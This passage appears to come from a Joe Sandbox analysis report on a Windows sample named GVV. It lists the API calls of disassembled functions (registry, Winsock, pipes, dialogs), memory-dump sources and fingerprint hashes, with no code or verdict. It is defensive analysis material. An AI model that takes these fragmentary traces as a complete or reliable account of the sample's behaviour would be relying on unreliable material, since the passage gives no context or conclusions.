                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0017778F
                • SysAllocString.OLEAUT32(00000000), ref: 00177792
                • SysAllocString.OLEAUT32(?), ref: 001777B0
                • SysFreeString.OLEAUT32(?), ref: 001777B9
                • StringFromGUID2.OLE32(?,?,00000028), ref: 001777DE
                • SysAllocString.OLEAUT32(?), ref: 001777EC
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                • String ID:
                • API String ID: 3761583154-0
                • Opcode ID: c69b2c51e9eae1571c04217b4710392009897acc9efe19d9463bb581b00f7b50
                • Instruction ID: a20fca3d3d2c965ac8eec4bdcd23669a79a444691dbef73640fdaa43b05155bc
                • Opcode Fuzzy Hash: c69b2c51e9eae1571c04217b4710392009897acc9efe19d9463bb581b00f7b50
                • Instruction Fuzzy Hash: 1D21B076604219AFDB14EFA8DC88CBB77FCEB09364B018425FA08DB190D770DC8287A4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00177842
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00177868
                • SysAllocString.OLEAUT32(00000000), ref: 0017786B
                • SysAllocString.OLEAUT32 ref: 0017788C
                • SysFreeString.OLEAUT32 ref: 00177895
                • StringFromGUID2.OLE32(?,?,00000028), ref: 001778AF
                • SysAllocString.OLEAUT32(?), ref: 001778BD
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                • String ID:
                • API String ID: 3761583154-0
                • Opcode ID: 27ca6e9b3a07ce91a11b36819826347b5f7dd7e378229adc5d0f2221e54395af
                • Instruction ID: 21c074539f82e75dbc8bf20efedb969f2d276fa97a6fec49aa2132da9263d91b
                • Opcode Fuzzy Hash: 27ca6e9b3a07ce91a11b36819826347b5f7dd7e378229adc5d0f2221e54395af
                • Instruction Fuzzy Hash: 85213035608214AFDB109FA8DC88DBA77FCEB09760B118125F919CB2A1DB74DC81CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetStdHandle.KERNEL32(0000000C), ref: 001804F2
                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0018052E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateHandlePipe
                • String ID: nul
                • API String ID: 1424370930-2873401336
                • Opcode ID: 3dfcdd8bf3f2b24e0af61f07ebb2dc6b98e652b17a414d07cb3653997bb19d4f
                • Instruction ID: 69a7bb9e94b966ca8ef7f1ad1a965a4df647cbc9771cd256a9e51ae812ae7c65
                • Opcode Fuzzy Hash: 3dfcdd8bf3f2b24e0af61f07ebb2dc6b98e652b17a414d07cb3653997bb19d4f
                • Instruction Fuzzy Hash: 39216075600309AFDB61AF29DC44A9A77E4BF49724F204A19F8A1D72E0D7709A88CF70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 001805C6
                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00180601
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateHandlePipe
                • String ID: nul
                • API String ID: 1424370930-2873401336
                • Opcode ID: bd983462b29915c1ac3cb5172eac69314574ce37a5fd77eb73db0dcc7609d84e
                • Instruction ID: 69ec9b2c9903fcab6717b12a8eef98ee36b25a24d4a997dbf65e140012a05381
                • Opcode Fuzzy Hash: bd983462b29915c1ac3cb5172eac69314574ce37a5fd77eb73db0dcc7609d84e
                • Instruction Fuzzy Hash: 732183755003099FDB61AF698C04A5A77E4BF99720F304B19F8A1E72E0E7709A64CF60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0011600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0011604C
                  • Part of subcall function 0011600E: GetStockObject.GDI32(00000011), ref: 00116060
                  • Part of subcall function 0011600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0011606A
                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001A4112
                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001A411F
                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001A412A
                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001A4139
                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001A4145
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$CreateObjectStockWindow
                • String ID: Msctls_Progress32
                • API String ID: 1025951953-3636473452
                • Opcode ID: 7aff2b4606bab9cd4007726e0e09de9c756c0f3d08e0cd877b11dff8e3cd830c
                • Instruction ID: 30d779cdbc5f2009bdedd58b104b076d3b4c9fcf7e33fca18527f7c7a13af2c7
                • Opcode Fuzzy Hash: 7aff2b4606bab9cd4007726e0e09de9c756c0f3d08e0cd877b11dff8e3cd830c
                • Instruction Fuzzy Hash: 4211E2B6140219BFEF108F64CC81EE77F9DEF09398F004110BA18A2190CBB29C61DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0014D7A3: _free.LIBCMT ref: 0014D7CC
                • _free.LIBCMT ref: 0014D82D
                  • Part of subcall function 001429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000), ref: 001429DE
                  • Part of subcall function 001429C8: GetLastError.KERNEL32(00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000,00000000), ref: 001429F0
                • _free.LIBCMT ref: 0014D838
                • _free.LIBCMT ref: 0014D843
                • _free.LIBCMT ref: 0014D897
                • _free.LIBCMT ref: 0014D8A2
                • _free.LIBCMT ref: 0014D8AD
                • _free.LIBCMT ref: 0014D8B8
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                • Instruction ID: 7b77029a6bf6f8145233abb249f73d26166b24d4bb220203e93a948785e7011c
                • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                • Instruction Fuzzy Hash: C2115971540B14AAEE21BFF0DC06FCB7B9CAF20705F800825F299A62A2DB34A5458661
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0017DA74
                • LoadStringW.USER32(00000000), ref: 0017DA7B
                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0017DA91
                • LoadStringW.USER32(00000000), ref: 0017DA98
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0017DADC
                Strings
                • %s (%d) : ==> %s: %s %s, xrefs: 0017DAB9
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: HandleLoadModuleString$Message
                • String ID: %s (%d) : ==> %s: %s %s
                • API String ID: 4072794657-3128320259
                • Opcode ID: 9bc1a8fb54d960aad58d1fa6ae16a677a4ba354d3b3d7346642a455bee6dd0cb
                • Instruction ID: 3e6c5b9d6dcf83803608620120f81adb4a1f388e6e6b2dd96b43e8738f1809d1
                • Opcode Fuzzy Hash: 9bc1a8fb54d960aad58d1fa6ae16a677a4ba354d3b3d7346642a455bee6dd0cb
                • Instruction Fuzzy Hash: FF014FF6500208BBE7109BA09D89EE6327CEB09301F404496B70AE2141EA749E848BB4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InterlockedExchange.KERNEL32(00DDEC00,00DDEC00), ref: 0018097B
                • EnterCriticalSection.KERNEL32(00DDEBE0,00000000), ref: 0018098D
                • TerminateThread.KERNEL32(72446D65,000001F6), ref: 0018099B
                • WaitForSingleObject.KERNEL32(72446D65,000003E8), ref: 001809A9
                • CloseHandle.KERNEL32(72446D65), ref: 001809B8
                • InterlockedExchange.KERNEL32(00DDEC00,000001F6), ref: 001809C8
                • LeaveCriticalSection.KERNEL32(00DDEBE0), ref: 001809CF
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                • String ID:
                • API String ID: 3495660284-0
                • Opcode ID: 4f969ffd15741bf1edeb45a364da9a5ffd320a9340665e68b6a3fe634e639184
                • Instruction ID: 31227f83e9721766ab74e05fdf297ef891ae64b74924de42ce0fb1ea3f5a8b83
                • Opcode Fuzzy Hash: 4f969ffd15741bf1edeb45a364da9a5ffd320a9340665e68b6a3fe634e639184
                • Instruction Fuzzy Hash: 5DF0C932542A12BBD7525BA4EE89BD6BA29FF06706F402026F20290CA1DB7595A5CFD0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00191DC0
                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00191DE1
                • WSAGetLastError.WSOCK32 ref: 00191DF2
                • htons.WSOCK32(?,?,?,?,?), ref: 00191EDB
                • inet_ntoa.WSOCK32(?), ref: 00191E8C
                  • Part of subcall function 001739E8: _strlen.LIBCMT ref: 001739F2
                  • Part of subcall function 00193224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0018EC0C), ref: 00193240
                • _strlen.LIBCMT ref: 00191F35
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                • String ID:
                • API String ID: 3203458085-0
                • Opcode ID: 5323cdca9fdf83392149a3932f154bfe985e91d18b13ab7119cd51232087c38b
                • Instruction ID: 5c25465bb2be95ba49b905f916eb347053911be5593915774cd8efc09f9c60b8
                • Opcode Fuzzy Hash: 5323cdca9fdf83392149a3932f154bfe985e91d18b13ab7119cd51232087c38b
                • Instruction Fuzzy Hash: 07B12431204341AFCB28DF24C885E6A7BE5AF94318F54895CF45A4F2E2DB31ED86CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetClientRect.USER32(?,?), ref: 00115D30
                • GetWindowRect.USER32(?,?), ref: 00115D71
                • ScreenToClient.USER32(?,?), ref: 00115D99
                • GetClientRect.USER32(?,?), ref: 00115ED7
                • GetWindowRect.USER32(?,?), ref: 00115EF8
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Rect$Client$Window$Screen
                • String ID:
                • API String ID: 1296646539-0
                • Opcode ID: 7c9cef0011cdb8b0d7841942820feecc0608f22b197847c6cf2b177d6afa8ce6
                • Instruction ID: 4cf01a5e534c3865c5efd0d1e0a3015fd45cbb4f61cfa5774f4ffd44b6d66dcb
                • Opcode Fuzzy Hash: 7c9cef0011cdb8b0d7841942820feecc0608f22b197847c6cf2b177d6afa8ce6
                • Instruction Fuzzy Hash: 82B16B34A0064ADFDB18CFA9C4407EEB7F2FF58314F14941AE8A9D7250D730AA95DB54
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __allrem.LIBCMT ref: 001400BA
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001400D6
                • __allrem.LIBCMT ref: 001400ED
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0014010B
                • __allrem.LIBCMT ref: 00140122
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00140140
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                • String ID:
                • API String ID: 1992179935-0
                • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                • Instruction ID: a36c617439597aeb9afab3a1322d50b8ea02d215b85d4236b815fb19d50b0364
                • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                • Instruction Fuzzy Hash: F7814972A00706ABE725AF39CC81B6B73E8AF65764F24453EF911D72A1E770D9018B50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001382D9,001382D9,?,?,?,0014644F,00000001,00000001,8BE85006), ref: 00146258
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0014644F,00000001,00000001,8BE85006,?,?,?), ref: 001462DE
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001463D8
                • __freea.LIBCMT ref: 001463E5
                  • Part of subcall function 00143820: RtlAllocateHeap.NTDLL(00000000,?,001E1444,?,0012FDF5,?,?,0011A976,00000010,001E1440,001113FC,?,001113C6,?,00111129), ref: 00143852
                • __freea.LIBCMT ref: 001463EE
                • __freea.LIBCMT ref: 00146413
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocateHeap
                • String ID:
                • API String ID: 1414292761-0
                • Opcode ID: 8c888e71930dccbc225c87bb27c1a0caaae2d1a3f688642e870fb086595bbce5
                • Instruction ID: 37665ff02aa91fc563ccb0a696b20f1045bb363bc50c964a8b796536ccf3ab12
                • Opcode Fuzzy Hash: 8c888e71930dccbc225c87bb27c1a0caaae2d1a3f688642e870fb086595bbce5
                • Instruction Fuzzy Hash: 8B51F372A00256ABDB258F64CC81EAF77A9FF56728F154629FC09D71A0DB34DC80C6A1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 0019C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0019B6AE,?,?), ref: 0019C9B5
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019C9F1
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA68
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA9E
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0019BCCA
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0019BD25
                • RegCloseKey.ADVAPI32(00000000), ref: 0019BD6A
                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0019BD99
                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0019BDF3
                • RegCloseKey.ADVAPI32(?), ref: 0019BDFF
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                • String ID:
                • API String ID: 1120388591-0
                • Opcode ID: 89834dad249323c9aca787938c6415f3f61a994d24834bc4746645e02a9ae4ef
                • Instruction ID: d30f218f457db060d8dabdea9dd22021732b8c4848e52ca2a8c180aa7ebdab3e
                • Opcode Fuzzy Hash: 89834dad249323c9aca787938c6415f3f61a994d24834bc4746645e02a9ae4ef
                • Instruction Fuzzy Hash: F181AD30208241AFCB14DF64D9D5E6ABBE5FF85308F14896CF4594B2A2DB31ED45CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VariantInit.OLEAUT32(00000035), ref: 0016F7B9
                • SysAllocString.OLEAUT32(00000001), ref: 0016F860
                • VariantCopy.OLEAUT32(0016FA64,00000000), ref: 0016F889
                • VariantClear.OLEAUT32(0016FA64), ref: 0016F8AD
                • VariantCopy.OLEAUT32(0016FA64,00000000), ref: 0016F8B1
                • VariantClear.OLEAUT32(?), ref: 0016F8BB
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Variant$ClearCopy$AllocInitString
                • String ID:
                • API String ID: 3859894641-0
                • Opcode ID: 33deb49de6e745106adbac095fcb2164426811965ed1121dbd8f15279d85e370
                • Instruction ID: 5fc66cfc23db15c75581b9ee01c727426b8ded0ff0575d9bb3c6f557defed71e
                • Opcode Fuzzy Hash: 33deb49de6e745106adbac095fcb2164426811965ed1121dbd8f15279d85e370
                • Instruction Fuzzy Hash: 5B51D331600310BACF28AB65EC95B29B3A8EF55314F20847EFD06DF291DB708C52CB96
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00117620: _wcslen.LIBCMT ref: 00117625
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                • GetOpenFileNameW.COMDLG32(00000058), ref: 001894E5
                • _wcslen.LIBCMT ref: 00189506
                • _wcslen.LIBCMT ref: 0018952D
                • GetSaveFileNameW.COMDLG32(00000058), ref: 00189585
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$FileName$OpenSave
                • String ID: X
                • API String ID: 83654149-3081909835
                • Opcode ID: 7c94b43750d1d4a06151db88270c3d21a1cebe5cf9c2dfe75b3ace5c7531c633
                • Instruction ID: eb4d7d08c70d8e403d15f87f1f029fa9b68fbbe4be2b16f2f88c21c8d47e6457
                • Opcode Fuzzy Hash: 7c94b43750d1d4a06151db88270c3d21a1cebe5cf9c2dfe75b3ace5c7531c633
                • Instruction Fuzzy Hash: 31E1A4315083409FC718EF24D881AAAB7E1BF95314F08856DF8999B2A2DB31EE45CF91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                • BeginPaint.USER32(?,?,?), ref: 00129241
                • GetWindowRect.USER32(?,?), ref: 001292A5
                • ScreenToClient.USER32(?,?), ref: 001292C2
                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001292D3
                • EndPaint.USER32(?,?,?,?,?), ref: 00129321
                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001671EA
                  • Part of subcall function 00129339: BeginPath.GDI32(00000000), ref: 00129357
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                • String ID:
                • API String ID: 3050599898-0
                • Opcode ID: 18047050891caa8f7a271e114fd2f75034ac1d683ac2211399633f3c0f5e0c41
                • Instruction ID: f3a03e7a1bfe1d93c705584c77a5c98987153e293adf436bdba33b145ec9056c
                • Opcode Fuzzy Hash: 18047050891caa8f7a271e114fd2f75034ac1d683ac2211399633f3c0f5e0c41
                • Instruction Fuzzy Hash: 0B41BD70204250AFD720DF68DC84FBA7BF8FB56724F040629F9948B2E2C7309895DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
